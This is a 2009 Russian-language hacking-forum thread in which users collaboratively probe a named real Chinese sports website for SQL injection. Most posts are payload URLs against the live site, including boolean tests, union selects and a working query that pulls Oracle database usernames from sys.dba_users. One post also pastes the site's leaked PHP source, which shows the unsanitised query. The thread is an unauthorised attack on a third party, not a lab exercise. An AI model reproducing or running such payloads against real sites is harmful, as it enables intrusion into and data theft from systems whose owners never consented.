Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.01.2009, 21:20
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+or+1=1+order+by+1--+
очень странный скрипт... скуля есть... если зашли в тупик то нажимайте ctrl+r
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+1+from+us ers--+
хз что думаете?
Последний раз редактировалось sabe; 19.01.2009 в 21:23..
|
|
|
19.01.2009, 21:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 sabe:
http://www.gotdotnet.ru/Forums/Web/342101.aspx
Думаю, что просто сайт глючный и не более, чем раскрытие пути:
Код:
http://www.sportscn.com/program/vote/vote_result.php?voteid=2
http://www.sportscn.com/program/vote/vote_result.php?voteid=226
т.к. при таких положительных показателях без всяких там кавычек, минусов и % выдает идентичнуюошибку
Последний раз редактировалось Pashkela; 19.01.2009 в 21:45..
|
|
|
|
19.01.2009, 21:36
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Pashkela
я знаю английский)) я спросил помочь...
да сайт странный..... выдавать может что угодно незабывай ctrl+r
а вобще скуля есть.. ибо вывод есть на or 1=1
|
|
|
|
19.01.2009, 21:42
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Бугагагага, кхе
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+or+1=1+group+by+1--
я взламал интернет.
З.Ы. сорри за офф.
Последний раз редактировалось AkyHa_MaTaTa; 19.01.2009 в 21:44..
|
|
|
|
19.01.2009, 21:44
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
AkyHa_MaTaTa
ORA-00979: not a GROUP BY expression
|
|
|
|
19.01.2009, 21:49
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от sabe
AkyHa_MaTaTa
ORA-00979: not a GROUP BY expression
А мне в фф выкидует исходник страницы:
PHP код:
<?
require("../lib/oci8_plus.inc");
require("../lib/function.inc");
if($voteid=="")
$voteid = 0;
?>
<html>
<head>
<title>»ЄМеµчІй</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="http://www.sportscn.com/css/newspcn.css" rel="stylesheet" type="text/css">
</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="473" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="132" height="38" align="center" valign="top" background="http://image.sportscn.com/2006/news/tab_diaocha.jpg" class="a3" style="padding-top:7px">»Є
Ме µч Ій</td>
<td width="341" align="right" valign="bottom" background="http://image.sportscn.com/2006/news/corner_diaocha.jpg"><div style="padding-right:14px"><img src="http://image.sportscn.com/2006/news/sportscn.gif" width="145" height="20"></div></td>
</tr>
<tr>
<td colspan="2" background="http://image.sportscn.com/2006/news/bg_diaocha.gif">
<?
$db=new OCI_PLUS;
$db->open("info");
$strsql = "select votename from comm_vote where voteid=".$voteid;
$db->query($strsql);
$db->movenext();
?>
<table width="450" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="10" align="center"> </td>
</tr>
<tr>
<td height="32" align="center"><strong><?=$db->f("votename")?></strong></td>
</tr>
</table>
<table width="450" border="1" align="center" cellpadding="0" cellspacing="0" bordercolorlight="C1C1C1" bordercolordark="ffffff" bgcolor="C1C1C1">
<?
$strsql = "select sum(voteamount) as vote_sum from comm_vote_content where ";
$strsql = $strsql."voteid = ".$voteid;
$db->query($strsql);
$db->movenext();
$vote_sum = $db->f("vote_sum");
$strsql = "select votecontentid,votecontent,voteamount from comm_vote_content ";
$strsql = $strsql."where voteid = ".$voteid." order by votecontentid ASC";
$db->query($strsql);
$count = 0;
while($db->movenext()){
if(($count%2)==0)
$color = "F5F5F5";
else
$color = "EAEAEA";
if ($vote_sum<>0){
$per = number_format(($db->f("voteamount")/$vote_sum),4);
}else{
$per = 0;
}
$tab_width = 250;
?>
<tr bgcolor="<?=$color?>">
<td width="155" height="20" bgcolor="F5F5F5" style="padding-left:5px"><?=$db->f("votecontent")?></td>
<td width="289" style="padding-left:5px"><img src="http://image.sportscn.com/2006/news/diaocha_bar.gif" width="<?=number_format($tab_width*$per,0)?>" height="12" align="absmiddle"> <?=($per*100)?>%</td>
</tr>
<?
$count++;
}
?>
<tr bgcolor="<?if(($count%2)==0) echo "F5F5F5";else echo "EAEAEA";?>">
<td height="20" colspan="2" align="center">ДїЗ°№ІУРЈє<?=($vote_sum)?> ИЛІОјУ</td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan="2"><img src="http://image.sportscn.com/2006/news/bottom_diaocha.gif" width="473" height="13"></td>
</tr>
</table>
</body>
</html>
а вот настройки к бд http://www.sportscn.com/program/lib/oci8_plus.inc
не не к бд, жз че какой то.
Последний раз редактировалось AkyHa_MaTaTa; 19.01.2009 в 21:54..
|
|
|
|
19.01.2009, 22:00
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
AkyHa_MaTaTa Ты не поверишь, но у всех так )
sabe Нет там скули
Исходник
http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=1--
http://www.sportscn.com/program/vote/vote_result.php?voteid=11+and+1=2--
Страница
http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=1--
http://www.sportscn.com/program/vote/vote_result.php?voteid=10+and+1=2--
Исходник
http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=1--
Страница
http://www.sportscn.com/program/vote/vote_result.php?voteid=1+and+1=2--
Логики не вижу , скорее идёт какая-то арифметика с аргументами
|
|
|
|
19.01.2009, 22:10
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Код:
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(username)+from+sys.dba_users--
Если не работает с первого раза, нажимайте ctrl+r. |
|
|
|
19.01.2009, 22:11
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от jokester
AkyHa_MaTaTa Ты не поверишь, но у всех так )
ну
Сообщение от sabe
AkyHa_MaTaTa
ORA-00979: not a GROUP BY expression
Блин, я думал что я зе оне, а оказываеться не так оно  .
|
|
|
|
19.01.2009, 22:14
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от R1dex
Код:
http://www.sportscn.com/program/vote/vote_result.php?voteid=1062+union+select+to_char(username)+from+sys.dba_users--
Если не работает с первого раза, нажимайте ctrl+r. Да жесть  А объяснить сможешь, почему когда хочет тогда работает  ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
